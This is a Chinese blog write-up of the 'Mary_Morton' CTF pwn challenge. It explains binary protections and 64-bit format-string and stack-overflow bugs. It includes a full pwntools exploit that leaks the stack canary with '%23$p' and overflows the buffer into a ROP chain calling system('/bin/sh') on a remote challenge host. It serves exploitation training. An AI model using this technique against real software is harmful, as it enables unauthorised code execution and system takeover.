Mary_Morton write up(pwn 64位格式化字符串和栈溢出

最新推荐文章于 2023-07-24 20:58:18 发布
最新推荐文章于 2023-07-24 20:58:18 发布
阅读量835 收藏 1
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43742794/article/details/98640383
版权

Morton.dms
首先用gdb(已安装peda)打开文件
checksec检查可执行文件属性

  1. CANNARY(栈保护) 即是否在栈中插入了cookie(linux中称为canary
  2. FORTIFY 防止缓冲区溢出攻击 不常见
  3. NX(Windows平台上称其为DEP)即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。
  4. PIE(ASLR)地址空间分布随机化
    0 - 表示关闭进程地址空间随机化。
    1 - 表示将mmap的基址,stack和vdso页面随机化。
    2 - 表示在1的基础上增加栈(heap)的随机化。
  5. RELRO 设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号,从而减少对GOT(Global Offset Table)攻击。RELRO为” Partial RELRO”,说明我们对GOT表具有写权限。

格式化字符串漏洞是因为printf的输出完全由用户控制
一个是通过%p(将参数以十六进制方式打印)来实现任意内存泄露
64位前六个参数位于寄存器,第多少个%p是目的内存则可以通过栈帧进行计算,八位(0x8)为一个%p
再就是通过%n(把输出字符的个数写入到地址中)来实现任意内存写入

栈溢出需要注意的则是由于开启了CANNARY,覆盖是需要注意把canary用原值覆盖

exp的思路是通过printf来泄露canary,然后进行栈溢出覆盖

from pwn import *

system_addr = 0x4006A0
binsh_addr = 0x400B2B
pop_addr = 0x400ab3
context.log_level = 'debug'
p = remote('111.198.29.45',52753)

p.sendline('2')
p.sendline('%23$p')
p.recvuntil('battle \n')
canary = int(p.recvline().strip('\n'),16)
#读取输出,去掉\n并表明读取的是十六进制然后转化为int储存
p.sendline('1')

payload = 'A'*0x88 + p64(canary) + 'A'*0x8 + p64(pop_addr) + p64(binsh_addr) + p64(system_addr)
p.sendline(payload)
p.interactive()
0bs3rver
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn——x64下的格式化字符串
qq_41560595的博客
02-16 516
x64和x86在格式化字符串传参上稍有不同,原因在于x64会把printf函数中的参数先传到6个寄存器中。下面以一道例题说明。 链接:https://pan.baidu.com/s/1fgg6HRr__08fW1P0HgmaKA 提取码:1111 二进制文件拖入IDA并F5 代码吧啦吧啦一大堆,实际上就是让你猜一个flag和真正的flag比对,比对正确会给你flag。= =我要是都知道flag还要你的flag干嘛?! gdb调试 断点断在_isoc99_scanf处,输入AAAA。调试到printf时,查
CTF-浅尝64位栈溢出PWN
热门推荐
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
64位Linux下的栈溢出
10-05
0x01 x86和x86_64的区别 0x02 漏洞代码片段 0x03 触发溢出 0x04 控制RIP 0x05 跳入用户控制的缓冲区 0x06 执行shellcode 0x07 GDB vs 现实 0x08 结语
64位格式化字符串漏洞pwn入门
z2876563的博客
08-10 1731
CTF竞赛权威指南PWN篇第166页参考程序 如下程序有格式化字符串漏洞,原文是编译成32位程序,为了增加难度,我编译成64位程序。以下我通过漏洞实现输入arg4的地址获取arg4的内容即ABCD。 //fmtdemo.c -o #include<stdio.h> void main() { char format[128]; int arg1 =1,arg2=0x88888882,arg3=-1; char arg4[10]="ABCD"; scanf("%s
pwn刷题num19----栈溢出
tbsqigongzi的博客
04-24 472
BUUCTF-PWN-rip 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启NX保护-----堆栈可执行 未开启PIE-----程序地址为真实地址 RWX----有可读可写可执行段 动态链接 ida一下,看一下主函数 这里的gets(&s, argv); gets第一个参数是要输出的字符串首地址,第二个参数是输出的字符串的长度 s占0xf个字节,这里argv的值是未知的,但这个程序能利用的也只
bailey_morton_cv:贝利·莫顿(Bailey Morton)的简历
04-01
bailey_morton_cv 贝利·莫顿(Bailey Morton)的简历
morton.dms
08-06
64位下的格式化字符串的任意内存读取 格式化字符串 %n ,它的功能是将%n之前打印出来的字符个数,赋值给一个变量。
d3-morton-order:D3布局,使用连续的莫顿(Z阶)空间填充曲线可视化距离变量
05-05
d3-莫顿 D3布局使用连续的莫顿(Z阶)空间填充曲线可视化距离变量。 这是一个。 另请参阅 。快速开始import d3ZOrder from 'd3-morton';或者d3.zOrder = require('d3-morton');甚至[removed][removed]然后const ...
morton BLDC__and_PCB_Included.rar
08-01
morton BLDC__and_PCB_Included.rar
Comparing-Filters:对基于Bloom,Cuckoo,Morton和PD的过滤器进行基准测试
04-04
有各种基准可以评估不同负载下的错误概率,并可以通过四个参数进行速度测试:插入,统一查找(标准情况下统一查找结果为“ no” whp),真实查找(过滤器中的元素)和删除。 用法 依存关系 由于CF使用openssl库,...
pwn刷题num14-----栈溢出
tbsqigongzi的博客
04-22 117
攻防世界pwn进阶区反应釜开关控制 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO---got表仍可写 未开启canary保护---存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 ida一下 发现栈溢出(灰色部分) 查看栈区,v5距离返回地址0x208字节(0x200+0x8) 查找有没有后门函数,发现一个shell函数 exp from pwn import
pwn刷题num20----栈溢出
tbsqigongzi的博客
04-25 150
BUUCTF-PWN-warmup_csaw_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 未开启NX保护-----堆栈可执行 未开启PIE-----程序地址为真实地址 RWX----有可读可写可执行段 动态链接 程序运行后告诉我们一个地址0x40060d ida一下看一下伪代码 主函数里有一个sprintf注意一下 sprintf(&s, "%
作业5:栈溢出格式化字符串溢出
diligent_lee的博客
07-20 504
信息安全实践作业5:栈溢出格式化字符串溢出 1. 实验一 根据实验一的题目要求,将数组 buffer1 的大小改为 50,将语句 x=1 改为 x=(x+5)*2。如下所示: 运行结果为: 然后进行gdb 调试: 通过 b 5 命令对程序第五行的语句 ret = buffer1 + 12 打断点,然后查看当前 $ebp 和 buffer1 的地址,不难得出,$ebp-buffer1=0xbffffd48-0xbffffd00=0x48=72,而且retip=$ebp+4。所以 retip=buf
好好说话之64位格式化字符串漏洞
hollk’s blog
08-06 2825
64位格式化字符串和32位的很相似,做题的步骤也相同,唯一不同的是64位程序对函数参数存储的方式和32位的不同。64为程序会优先将函数的前6个参数放置在寄存器中,超过6个的再存放在栈上,而32位直接存放在栈上。寄存器存放顺序可以看我之前写的好好说话之ret2csu 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ 例题选自2017-UIUCTF-pwn200-GoodLuck checksec搞一下 64位程序,开启了NX保护、Canary。因为我们知道这是一道格式化字符串的题
pwn学习总结 栈溢出,canary绕过和格式化字符串
MrTreebook的博客
11-07 688
pwn学习总结 栈溢出,canary绕过和格式化字符串 目录pwn学习总结 栈溢出,canary绕过和格式化字符串1. checksec看一下保护2. IDA 看一下3. dgb动态调试3.1. gdb打开canary文件,断点先下在main函数上3.2. disass命令查看一下func函数的汇编代码3.3. 首先看一下canary的偏移是多少3.4. 在上面的func函数的汇编代码中可以看到canary的偏移量是多少3.5. 看一下canary的地址3.6. 看一下栈,计算一下溢出量4. exp 1.
第一道pwn栈溢出
小白垃圾笔记2
03-03 874
代码和解题思路来自启明星辰的《ctf安全竞赛入门》,当然还有好多热心的师傅们的指导。
PWN基础知识及基础栈溢出手法
山高路远
04-12 3861
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
关于pwn64位amd构造payload时的堆栈平衡问题以及32位与64位构造payload的区别与注意事项
最新发布
hu_c_t_f的博客
07-24 2196
pwn入门,栈溢出漏洞是比较合适的。但我们经常会遇到i386【下面称32位】和arm64【下面称64位】的可执行程序【题目附件】。而32位与64位同样的情况,比如同样是ret2text或ret2syscall时,写的payload是不一样的,但大体的思路是一样的。本人也是入门pwn的小白,写的不对的地方还请师傅们指出。栈堆平衡32位中,没有堆栈平衡一说,而64位中有。payload中的堆栈平衡简单来说,就是要保证payload的字节数是16的倍数。
没有对方libc文件,如何getshell?xdctf12 pwn200 与 welpwnwriteup
哒君的博客
07-26 395
DynELF 文档:https://pwntools.readthedocs.io/en/stable/dynelf.html 简单来说,DynELF可以泄漏对方的libc信息 关于DynELF的原理,这个博客讲的很详细
求矩阵四叉树的四进制和十进制Morton
06-09
矩阵四叉树的四进制和十进制Morton码计算方法如下: 1. 四进制Morton码 四进制Morton码将矩阵四叉树节点的坐标编码成四进制数,其中每一位表示节点在四叉树中的位置,从根节点开始计算。具体计算方法如下: - 将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值